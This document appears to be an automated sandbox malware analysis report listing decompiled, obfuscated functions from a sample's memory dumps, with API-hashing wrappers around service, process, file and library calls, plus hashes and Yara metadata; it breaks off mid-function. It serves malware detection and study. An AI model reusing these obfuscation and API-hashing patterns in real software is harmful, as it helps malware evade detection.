Function 007E5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E007E5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E007E602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E007F07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x007e5fb5
0x007e5fb6
0x007e5fb7
0x007e5fbb
0x007e5fbc
0x007e5fc1
0x007e5fcb
0x007e5fd7
0x007e5fde
0x007e5fe5
0x007e5ffc
0x007e5fff
0x007e6006
0x007e600d
0x007e601a
0x007e6025
0x007e602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 007E6025

Memory Dump Source

Source File: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, Offset: 007E0000, based on PE: true

Associated: 0000000A.00000002.2115937134.00000000007E0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2115984048.00000000007FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: f5c25d5993ca95e91cf44411f01b90e0f366a72adf5c304038c27d3b0a79b332
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 9AF04FB0C1120CFFDB08DFA0E94689EBFB9EB40340F208198E909A7261E7755F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2468 Parent PID: 2700 rundll32.exeCOMMON

Executed Functions

Function 00382959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00382959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0038602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E003907A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0038295f
0x00382964
0x00382967
0x0038296a
0x0038296d
0x0038296e
0x0038296f
0x00382977
0x00382985
0x0038298a
0x00382992
0x0038299a
0x003829a2
0x003829a9
0x003829b0
0x003829b7
0x003829bb
0x003829cf
0x003829dc
0x003829e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 003829DC

Strings

<^, xrefs: 00382977

Memory Dump Source

Source File: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000B.00000002.2118300491.0000000000380000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2118380774.000000000039C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: fd8ab27878025a0f3eabb3df754e0509bb2fc8f3abe89e7ecace0bb6fa5de511
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: A8016D72A00208BFEB19DF95DC0A8DFBFB6EF44310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0038C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0038C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0038602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E003907A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0038c6e1
0x0038c6e6
0x0038c6f0
0x0038c6fc
0x0038c703
0x0038c706
0x0038c70d
0x0038c711
0x0038c715
0x0038c71c
0x0038c723
0x0038c72a
0x0038c731
0x0038c738
0x0038c751
0x0038c762
0x0038c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0038C762

Strings

/O, xrefs: 0038C6E6

Memory Dump Source

Source File: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000B.00000002.2118300491.0000000000380000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2118380774.000000000039C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: ae94bef24b70731baa90132ad1a1f49b3b23d9e799d81c48955c248cae3c7c37
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 421122B290122DBBCF269F94DC4A8EFBEB9EF04714F108188B90966210D3714A659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00381000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00381000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0038602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E003907A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00381006
0x00381009
0x0038100c
0x00381011
0x00381016
0x0038101d
0x00381026
0x0038102d
0x00381034
0x0038103b
0x00381047
0x0038104f
0x00381057
0x0038105e
0x00381065
0x0038106c
0x00381073
0x00381077
0x0038108b
0x00381096
0x0038109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00381096

Strings

[, xrefs: 0038103B

Memory Dump Source

Source File: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000B.00000002.2118300491.0000000000380000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2118380774.000000000039C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: fac3bb163c9063369e6b785752264e52480ef784a4a13106d2729792cacf4428
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: A5015BB6D01308BBEF04DFA4C94A5DEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00384859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00384859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E003907A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0038485e
0x0038487a
0x0038487d
0x00384884
0x0038488b
0x00384892
0x0038489d
0x003848a0
0x003848ad
0x003848b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 003848B7

Strings

[, xrefs: 0038488B

Memory Dump Source

Source File: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000B.00000002.2118300491.0000000000380000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2118380774.000000000039C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: e5929a1c5696d568a6ff01a2a8bff7e07233eeea08e83aa08436d701f3918b0d
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 44F0F970905209BBDB04CFE8C95699EBFB5AB40301F208188E444B7290E2715F509A50

Uniqueness

Uniqueness Score: -1.00%

Function 00394F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00394F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0038602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E003907A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00394f80
0x00394f81
0x00394f82
0x00394f86
0x00394f87
0x00394f8c
0x00394fa5
0x00394fa8
0x00394faf
0x00394fb6
0x00394fc7
0x00394fca
0x00394fd7
0x00394fe2
0x00394fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00394FE2

Strings

{#lm, xrefs: 00394FC2

Memory Dump Source

Source File: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000B.00000002.2118300491.0000000000380000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2118380774.000000000039C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 686464ea2d862033912e7a40ed52c7ee8bd864ebddba79fb319a549cc83bb733
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: F5F037B081120CFFEF09EFA4D94289EBFBAEB40310F208199E805BB250D3715B509B54

Uniqueness

Uniqueness Score: -1.00%

Function 0039976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0039976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0038602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E003907A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00399772
0x00399773
0x00399778
0x0039977a
0x0039977b
0x0039977e
0x0039977f
0x00399782
0x00399785
0x00399788
0x00399789
0x0039978c
0x0039978f
0x00399790
0x00399791
0x00399794
0x00399797
0x0039979a
0x0039979d
0x003997a0
0x003997a3
0x003997a6
0x003997a7
0x003997a8
0x003997ad
0x003997b7
0x003997c3
0x003997ca
0x003997d1
0x003997d8
0x003997df
0x003997e3
0x003997fc
0x00399816
0x0039981d

APIs

CreateProcessW.KERNEL32(0038591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0038591A), ref: 00399816

Memory Dump Source

Source File: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000B.00000002.2118300491.0000000000380000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2118380774.000000000039C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 5e7408902248144e0c55a3d630048d4d1ca8137c710f1adb3cef5dbbec6790b1
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 4A11B372901148BFDF1A9FD6DC0ACDF7F7AEF89750F104148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0038B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0038B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0038602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E003907A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0038b569
0x0038b56a
0x0038b56d
0x0038b572
0x0038b574
0x0038b577
0x0038b57a
0x0038b57d
0x0038b580
0x0038b583
0x0038b586
0x0038b587
0x0038b58a
0x0038b58d
0x0038b590
0x0038b593
0x0038b594
0x0038b595
0x0038b59a
0x0038b5a4
0x0038b5b8
0x0038b5c0
0x0038b5c4
0x0038b5cb
0x0038b5d2
0x0038b5d9
0x0038b5e6
0x0038b5fd
0x0038b604

APIs

CreateFileW.KERNELBASE(00390668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00390668,?,?,?,?), ref: 0038B5FD

Memory Dump Source

Source File: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000B.00000002.2118300491.0000000000380000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2118380774.000000000039C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 73b700d2c42ee3b3cd5eea7d8dd3ea88f908185a2231e0705afc993cfaa82c85
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 1011C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1866120D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0039981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0039981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0038602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E003907A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00399821
0x00399822
0x00399825
0x00399828
0x0039982a
0x0039982c
0x0039982f
0x00399832
0x00399835
0x00399836
0x00399837
0x0039983c
0x00399855
0x00399858
0x0039985f
0x00399866
0x0039986d
0x00399874
0x0039987b
0x0039988e
0x0039989b
0x003998a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,003887F2,0000CAAE,0000510C,AD82F196), ref: 0039989B

Memory Dump Source

Source File: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000B.00000002.2118300491.0000000000380000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2118380774.000000000039C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 5341cb5eba114eca8ae24c54c8b0fadac36589b88a20156781fe40c0f3adf054
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 52019E72801208FBDF04EFD5D846CDF7F79EF85310F108188F908A6220E6715B119BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00397BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00397BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0038602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E003907A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00397bf7
0x00397bf8
0x00397bfa
0x00397bfd
0x00397bff
0x00397c02
0x00397c06
0x00397c07
0x00397c0f
0x00397c1d
0x00397c25
0x00397c2d
0x00397c31
0x00397c38
0x00397c3f
0x00397c46
0x00397c4a
0x00397c5e
0x00397c67
0x00397c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00397C67

Memory Dump Source

Source File: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000B.00000002.2118300491.0000000000380000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2118380774.000000000039C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: e15aa78b29b4c2f79730ea54909b8d487048cb8391b9d1b921516b9cf3ef197d
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: AC014FB190120CFFEB09DFA4C84A8DE7BB5EF44314F108198F405A7240E6B15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 0038F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0038F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0038602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E003907A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0038f662
0x0038f663
0x0038f665
0x0038f668
0x0038f66a
0x0038f66d
0x0038f670
0x0038f673
0x0038f677
0x0038f678
0x0038f67d
0x0038f687
0x0038f693
0x0038f69a
0x0038f6a1
0x0038f6a5
0x0038f6a9
0x0038f6b0
0x0038f6c9
0x0038f6d8
0x0038f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0038F6D8

Memory Dump Source

Source File: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000B.00000002.2118300491.0000000000380000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2118380774.000000000039C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: d887feba4729fbbc984dedd8c01bc968c9e582905d0ea61b2b18854df101b81f
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: DC01E5B6901208BFEF06AF94DC068DF7F75EB05324F148188F90566250D6B25E21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0038B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0038B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0038602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E003907A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0038b6f3
0x0038b6f8
0x0038b702
0x0038b70b
0x0038b712
0x0038b719
0x0038b720
0x0038b727
0x0038b72e
0x0038b747
0x0038b759
0x0038b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0038B759

Memory Dump Source

Source File: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000B.00000002.2118300491.0000000000380000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2118380774.000000000039C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 326723a99a5c0a71ab73927dbeba68cb0aa31a9237e52d1212fe093becec5d83
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 4D012CB5941308FBEF45DF94DD06A9E7BB5EB14714F108188FA056A190D3B25A209B51

Uniqueness

Uniqueness Score: -1.00%

Function 0039AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0039AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0038602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E003907A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0039aa3f
0x0039aa40
0x0039aa41
0x0039aa44
0x0039aa47
0x0039aa4b
0x0039aa4c
0x0039aa51
0x0039aa5b
0x0039aa64
0x0039aa68
0x0039aa6f
0x0039aa76
0x0039aa8d
0x0039aa90
0x0039aa9d
0x0039aaa8
0x0039aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0039AAA8

Memory Dump Source

Source File: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000B.00000002.2118300491.0000000000380000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2118380774.000000000039C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 120d351cce87f50ceaae5286827148afdd7fac1bb0a359197c9c485880c36ecd
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 2FF069B190020CFFDF09EFA4DD4A89EBFB5EB40304F108088F805A7250D3B29B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 00385FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00385FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
